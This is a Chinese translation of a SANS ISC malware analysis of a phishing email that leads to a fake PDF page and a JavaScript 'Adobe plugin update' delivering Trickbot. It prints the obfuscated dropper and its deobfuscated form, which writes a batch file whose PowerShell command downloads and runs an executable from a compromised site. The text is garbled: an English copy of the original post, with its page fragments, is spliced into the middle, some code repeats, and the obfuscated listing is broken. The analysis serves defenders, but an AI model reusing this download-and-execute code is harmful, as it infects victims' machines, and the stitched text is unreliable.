網絡釣魚可以說是一個老生常談的話題了,但時至今日它仍受到許多攻擊者的歡迎。比如一封郵件,一個附件,一個連結位址,再配上一段美麗陷阱的謊言。這看似老套,卻讓受害目标一次又一次的淪陷。在不久前,我提取到了一個非常好的樣本,該樣本将證明釣魚攻擊活動仍然是感染計算機的絕佳方式!在以下場景中,目标使用者采取了正确的方式,将其報告給了安全團隊。
讓我們首先來回顧一下經典的初始郵件:
當受害者點選連結時,初始螢幕将會模拟PDF檔案。請注意,郵件正文中的密碼未被使用。
可以看到,假PDF檔案僅向我們展示了一個空白的頁面。大多數使用者在這種情況下會怎麼做? 沒錯!他們會拖動滑鼠向下滾動。這個事件可以被JavaScript攔截:
window.onscroll = function (e) {
// called the malicious code.
}
當受害者開始滾動時,會顯示以下彈出視窗:
這裡要求使用者安裝被僞裝成Windows JavaScript的Adobe PDF插件更新:“Adobe-PDF-Install.js”。
以下為腳本的轉儲代碼,為便于閱讀已做相應優化:
new Function(['var jingrang = new ActiveXObject("Scripting.FileSystemO', "blitzden", "MakcRulit586", "bearchuck", "swaybang"][] +["foxlinux", "AVEVARUM", 'bject");
var zitebrok = jingrang.GetSpecialFolder(2)+"\\\\\\\\ogc'][] + ['igr.txt";
var picture137 = jingrang.CreateTextFile(zitebrok, true);
picture137.', "ANIKVOBOL", "welcomes", "multicast"][] + ['WriteLine("dogstever");picture137.Close();
var tuesaint ', "ANILAZARO", "capchaos", "ilivhsaivhcazd"][] + ["houndchi", "SoulxGreatx", '= jingrang.GetFileVersion(zitebrok);
if(typeof tuesaint == "string"', "labareda"][] + ["vorezeak", ') {
String.prototype.cultrulf = function () {
var oscargator = []', "nguyen008"][] + ["doctelecom", ';
for (var i = 0; i < arguments.length; i++) {
oscargator.p', "gryunaca"][] + ['ush(arguments[i]);
}
return eval("String.fromCharCod', "banditcat", "taylor1970", "brabwhee"][] + iiksniglO() + String.fromCharCode(Math.floor(Math.random() + )) + ['(",")+")");
}
};', "fledcinc", "cooledge"][])();
function iiksniglO(){
return ("disintegrator", "pematric", "coupdrat", "sevenisis", 'e("+oscargator.joi'.banga123()) + clumblis() + 'oi';
}
function clumblis() {
var objWMIService = GetObject("winmgmts:"); var o = "";
try {
var objLD = objWMIService.Get("Win32_LogicalDisk.DeviceID='y1:'"); o = "1";
}
catch (e) {
o = '("+oscargator.j';} return o;
}
function String.prototype.banga123(){
return this.split('').reverse().pop();
}
new Function("".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) +
"".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , ))();
Once the garbage code removed and some deobfuscation, you get some PowerShell code: (also beautified)
var fso = new ActiveXObject("Scripting.FileSystemObject”);
var temp = fso.GetSpecialFolder(2);
var script = “
PowerShell \"function Ebfu8([String] $mcudvlsla) {
(New-Object System.Net.WebClient).DownloadFile($mcudvlsla,'" + temp + "\\noqnwutj.exe’);Start-Process '" + temp + "\\noqnwutj.exe’;}
try{Ebfu8('http://coinicos.io/images/logo.bin’)}
catch{Ebfu8('http://coinicos.io/images/logo.bin')}";var nameBat = "sdjkfh";var pathBt = temp + "\\" + nameBat + ".bat";var outFile = fso.CreateTextFile(pathBat, true);outFile.WriteLine(script);outFile.Close();var shell = new ActiveXObject("WScript.Shell");shell.run(pathBat, );fso.DeleteFile(WSH.ScriptFullName);
It creates the following batch file in %TEMP%:
PowerShell "function Ebfu8([String] $mcudvlsla){(New-Object System.Net.WebClient).DownloadFile($mcudvlsla,'C:\DOCUME~1\Xavier\LOCALS~1\Temp\noqnwutj.exe');Start-Process 'C:\DOCUME~1\Xavier\LOCALS~1\Temp\noqnwutj.exe';}try{Ebfu8('http://coinicos.io/images/logo.bin')}catch{Ebfu8('http://coinicos.io/images/logo.bin’)}
And executes it via a CMD.exe:
cmd /c ""C:\DOCUME~1\Xavier\LOCALS~1\Temp\sdjkfh.bat" "
The compromised website ("coinicos.io") may think about a new crypto miner attack but it's not the case. The site is just used to deliver the payload. It is downloaded and executed by PowerShell. Its current VT score is 19/66 [1]. The PE file copies itself in %APPDATA%\Roaming\wsxmail\lloydt.exe and creates a scheduled task called “MsTools" for persistence (see my last diary[]). This is a classic Trickbot[]. To resume we have the following infection path:
Email > JavaScript > PowerShell > Batch file > Scheduled task
[] https://www.virustotal.com/en/file/aff5fa4ec4cd78bcf5f1c712f361bbd7d428800bea08c23cae66f0947e66c2a3/analysis/1525780303/
[] https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
[] https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Xme
POSTS
ISC HANDL
移除垃圾代碼以及反混淆處理後,你會得到一些PowerShell代碼(已優化處理):
var fso = new ActiveXObject("Scripting.FileSystemObject”);
var temp = fso.GetSpecialFolder(2);
var script = “
PowerShell \"function Ebfu8([String] $mcudvlsla) {
(New-Object System.Net.WebClient).DownloadFile($mcudvlsla,'" + temp + "\\noqnwutj.exe’);Start-Process '" + temp + "\\noqnwutj.exe’;}
try{Ebfu8('http://coinicos.io/images/logo.bin’)}
catch{Ebfu8('http://coinicos.io/images/logo.bin')}";var nameBat = "sdjkfh";var pathBt = temp + "\\" + nameBat + ".bat";var outFile = fso.CreateTextFile(pathBat, true);outFile.WriteLine(script);outFile.Close();var shell = new ActiveXObject("WScript.Shell");shell.run(pathBat, );fso.DeleteFile(WSH.ScriptFullName);
它會在%TEMP%中建立以下批處理檔案:
并通過CMD.exe執行:
被黑網站(“coinicos.io”)可能會考慮新的加密礦工攻擊,但事實并非如此。該網站隻是用來提供有效載荷,并由PowerShell下載下傳和執行。目前的VT評分是19/66[1]。PE檔案将自己複制到%APPDATA%\Roaming\wsxmail\lloydt.exe中,并建立一個名為“MsTools”的計劃任務以實作控制的持久性(請參閱我的上一篇文章[2])。這是一個經典的Trickbot[3]。該釣魚郵件的感染路徑如下:
電子郵件> JavaScript> PowerShell>批處理檔案>計劃任務
[1] https://www.virustotal.com/en/file/aff5fa4ec4cd78bcf5f1c712f361bbd7d428800bea08c23cae66f0947e66c2a3/analysis/1525780303/
[2] https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
[3] https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/
*參考來源:sans,FB小編 secist 編譯,轉載請注明來自FreeBuf.COM